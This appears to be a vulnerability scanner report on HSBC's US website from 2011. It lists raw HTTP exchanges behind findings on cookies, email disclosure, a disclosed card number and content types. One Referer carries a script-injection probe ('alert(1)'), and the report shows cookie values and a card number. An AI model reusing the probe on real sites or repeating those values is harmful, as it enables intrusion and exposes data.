The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /1/2/3/personal/inside/equal-housing-lender HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:08:15 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:09:15 GMT Vary: User-Agent,Cookie Set-Cookie: USIB2G=0000tXT0h3CMztgoOy3Nf2S8Oxu:14k1jbteq; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:08:14 GMT; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en Content-Length: 29952
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:07:57 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /1/2/3/personal/inside/locator HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:07:58 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:08:58 GMT Vary: User-Agent,Cookie Set-Cookie: USIB2G=0000XuYA5zycUb_kMU108E2zc74:14k1jbteq; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:07:57 GMT; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en Content-Length: 28541
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:08:04 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /1/2/3/personal/inside/privacy HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:08:04 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:09:04 GMT Vary: User-Agent,Cookie Set-Cookie: USIB2G=0000WFAqRtPHk7Mi4IMkjfZBBeL:14k1jbteq; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:08:04 GMT; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en Content-Length: 24496
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:08:06 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /1/2/3/personal/inside/securitysite/overview HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:08:07 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:09:07 GMT Vary: User-Agent,Cookie Set-Cookie: USIB2G=0000JvjV7LATuxO7gLggRhC6pjG:14k1jbteq; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:08:06 GMT; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en Content-Length: 18068
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:08:11 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /1/2/3/personal/inside/site-map HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:08:12 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:09:12 GMT Vary: User-Agent,Cookie Set-Cookie: USIB2G=0000FabIg8_qSPGKBYXy0JoxqFh:14k1jbteq; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:08:11 GMT; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en Content-Length: 49457
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:08:09 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /1/2/3/personal/inside/terms-conditions HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:08:10 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:09:10 GMT Vary: User-Agent,Cookie Set-Cookie: USIB2G=0000r319CzrpYumYl3b-SV4gxEX:14k1jbteq; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:08:09 GMT; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en Content-Length: 38306
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:08:15 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /1/2/3/personal/insurance HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:08:16 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:09:16 GMT Vary: User-Agent,Cookie Set-Cookie: USIB2G=0000hszcDSjSFuLTxvFfbnrfmX7:14k1jbteq; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:08:15 GMT; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en Content-Length: 41784
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /1/2/content/usshared/Kiosk/red_launched_bar.gif HTTP/1.1 Host: www.us.hsbc.com Proxy-Connection: keep-alive Referer: http://www.us.hsbc.com/1/2/3/hsbcpremier/prom/nov-10?code=PMD0006263&WT.srch=1&WT.mc_id=HBUS_PMD0006263 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq; HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; www.us.hsbc.com-VH=63510956.20992.0000
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:26:47 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 16:27:47 GMT Vary: User-Agent,Cookie Content-Length: 6290 Set-Cookie: USIB2G=0000ojgRDdTn7hAKDTTaN9ys2wF:14k1jbteq; Path=/ S: hbus-vh502_1 Content-Type: text/html; charset=UTF-8 Content-Language: en
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /1/2/null HTTP/1.1 Host: www.us.hsbc.com Proxy-Connection: keep-alive Referer: http://www.us.hsbc.com/1/2/3?command=makeThisMyHome&hp_pref=r74bf5%22%3balert(1)//00c0d1ff9 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: hp_pref=r74bf5; HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; www.us.hsbc.com-VH=80288172.20992.0000; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296775974194:ss=1296775937317; USIB2G=00005EK9jF4bpOMzFrUSkh3Dd5x:14k1jbteq
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 18:42:14 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 18:43:14 GMT Vary: User-Agent,Cookie Content-Length: 6290 Set-Cookie: USIB2G=0000vijfHIiL6nnUjcTBFs6QLwZ:14k1plrvc; Path=/ S: hbus-vh602_1 Content-Type: text/html; charset=UTF-8 Content-Language: en
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.
However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
The following email addresses were disclosed in the response:
investor.relations.usa@us.hsbc.com
latinamerica.international.center@us.hsbc.com
usphishing@us.hsbc.com
Request
GET /1/2/3/contact-us HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:08:47 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:09:47 GMT Vary: User-Agent,Cookie Set-Cookie: USIB2G=0000KxsP67T1EzncR8Q9s-Hu6WR:14k1jbteq; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en Content-Length: 47073
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
The following email addresses were disclosed in the response:
latinamerica.international.center@us.hsbc.com
us.ibc@us.hsbc.com
Request
GET /1/2/3/hsbcpremier/worldwide HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:07:31 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:08:31 GMT Vary: User-Agent,Cookie Set-Cookie: USIB2G=0000889--KYhrWRXG4tIc57Zlai:14k1jbteq; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:07:31 GMT; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en Content-Length: 37020
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The following email address was disclosed in the response:
latinamerica.international.center@us.hsbc.com
Request
GET /1/2/3/international-services/bank/prem-services HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:08:52 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:09:52 GMT Vary: User-Agent,Cookie Set-Cookie: USIB2G=0000wOC8RQhTEEsUmcdCwwO7df2:14k1jbteq; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:08:52 GMT; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en Content-Length: 33587
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
The following credit card number was disclosed in the response:
4591000524524300
Issue background
Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.
Request
GET /1/PA_1_083Q9FJ08A002FBP5S00000000/content/usshared/Personal%20Services/Online%20Services/Online%20Account%20Opening/Shared/PDF/sig_card.pdf HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:09:05 GMT Server: IBM_HTTP_Server Last-Modified: Wed, 10 Jun 2009 14:54:17 GMT Content-Length: 53781 S: hbus-vh502_1 Connection: close Content-Type: application/pdf Content-Language: en-US
The response contains the following Content-type statement:
Content-Type: application/x-javascript
The response states that it contains script. However, it actually appears to contain plain text.
Issue background
If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.
In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.
Request
GET /1/themes/html/hbus_common/HSBC-bottom_section.js HTTP/1.1 Host: www.us.hsbc.com Proxy-Connection: keep-alive Referer: http://www.us.hsbc.com/1/2/3/hsbcpremier/prom/nov-10?code=PMD0006263&WT.srch=1&WT.mc_id=HBUS_PMD0006263 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq; HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; www.us.hsbc.com-VH=63510956.20992.0000